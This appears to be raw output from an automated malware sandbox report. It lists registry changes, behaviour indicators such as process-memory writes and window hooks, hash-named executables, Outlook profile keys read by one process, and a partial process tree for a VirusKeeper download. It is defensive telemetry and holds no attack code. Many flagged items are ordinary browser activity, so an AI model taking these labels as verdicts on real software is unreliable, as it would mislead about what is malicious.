Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\5\MRUListEx = ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\Analyse antivirus avec VirusKeeper\command\ = "C:\\Program Files (x86)\\AxBx\\VirusKeeper 2024 Free Edition\\vk_scan.exe folder \"%1\""	setup.tmp
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	vk_scan.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exesetup.tmpmsedge.exemsedge.exeidentity_helper.exemsedge.exeSetup.exeSetup.exemore.commore.comRegSvcs.exesvchost.exevk_service.exe

pid	process
780	chrome.exe
780	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
3212	chrome.exe
2832	setup.tmp
2832	setup.tmp
2044	msedge.exe
2044	msedge.exe
1460	msedge.exe
1460	msedge.exe
5308	identity_helper.exe
5308	identity_helper.exe
5556	msedge.exe
5556	msedge.exe
5556	msedge.exe
5556	msedge.exe
1680	Setup.exe
1680	Setup.exe
3960	Setup.exe
1708	more.com
1708	more.com
3960	Setup.exe
7092	more.com
7092	more.com
4320	RegSvcs.exe
4320	RegSvcs.exe
1584	svchost.exe
1584	svchost.exe
1584	svchost.exe
1584	svchost.exe
1584	svchost.exe
1584	svchost.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe

Suspicious behavior: GetForegroundWindowSpam 8 IoCs

Processes:

VirusKeeper.exeviruskeeper.exeExplorer.EXEProcessWatch2.exevk_secad.exeviruskeeper.exesvchost.exemsedge.exe

pid	process
3148	VirusKeeper.exe
6836	viruskeeper.exe
3544	Explorer.EXE
4508	ProcessWatch2.exe
3732	vk_secad.exe
5640	viruskeeper.exe
6676	svchost.exe
5728	msedge.exe

Suspicious behavior: MapViewOfSection 36 IoCs

Processes:

Setup.exemore.comSetup.exemore.comepistemology.exe09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exesvchost.exevk_scan.exe9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exesvchost.execontrol.exe26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exewinver.exe32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exesvchost.exefsutil.exePO.exe

pid	process
1680	Setup.exe
1708	more.com
3960	Setup.exe
7092	more.com
6244	epistemology.exe
6244	epistemology.exe
1948	09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe
1584	svchost.exe
3248	vk_scan.exe
3248	vk_scan.exe
5612	9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe
2832	svchost.exe
2832	svchost.exe
2832	svchost.exe
5888	control.exe
5888	control.exe
5888	control.exe
5888	control.exe
5064	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
3936	winver.exe
3936	winver.exe
3936	winver.exe
3936	winver.exe
5888	control.exe
7020	32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe
3460	svchost.exe
5888	control.exe
5888	control.exe
6104	fsutil.exe
6104	fsutil.exe
6104	fsutil.exe
6104	fsutil.exe
5888	control.exe
1648	PO.exe
5888	control.exe
5888	control.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

chrome.exemsedge.exemsedge.exemsedge.exemsedge.exe

pid	process
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
5136	msedge.exe
5136	msedge.exe
4576	msedge.exe
4576	msedge.exe
4576	msedge.exe
3216	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe
Token: SeShutdownPrivilege	780	chrome.exe
Token: SeCreatePagefilePrivilege	780	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exeVirusKeeper.exemsedge.exe

pid	process
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
780	chrome.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
1460	msedge.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

javaw.exe26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exeviruskeeper.exeExplorer.EXEsvchost.exemsedge.exe

pid	process
904	javaw.exe
4368	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
6836	viruskeeper.exe
6836	viruskeeper.exe
3544	Explorer.EXE
3544	Explorer.EXE
3544	Explorer.EXE
3544	Explorer.EXE
3544	Explorer.EXE
3544	Explorer.EXE
3544	Explorer.EXE
3544	Explorer.EXE
3544	Explorer.EXE
6676	svchost.exe
5728	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 780 wrote to memory of 4204	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4204	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 3116	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 2496	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 2496	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe
PID 780 wrote to memory of 4240	780	chrome.exe	chrome.exe

outlook_office_path 1 IoCs

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe

outlook_win_path 1 IoCs

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.viruskeeper.com/fr/telecharger.html
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc27decc40,0x7ffc27decc4c,0x7ffc27decc58
    3⤵
    PID:4204
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:2
    3⤵
    PID:3116
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=276,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
    3⤵
    PID:2496
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8
    3⤵
    PID:4240
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
    3⤵
    PID:3608
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
    3⤵
    PID:3396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3644,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:8
    3⤵
    PID:864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4740,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4504 /prefetch:1
    3⤵
    PID:924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5128,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:8
    3⤵
    PID:3872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5104,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5272 /prefetch:8
    3⤵
    PID:4492
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3220,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4532 /prefetch:1
    3⤵
    PID:4228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5348,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5364 /prefetch:1
    3⤵
    PID:3924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5448,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5368 /prefetch:8
    3⤵
    PID:1128
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5464,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5572 /prefetch:8
    3⤵
    PID:1852
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4508,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5160 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3212
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5340,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5544 /prefetch:1
    3⤵
    PID:4676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
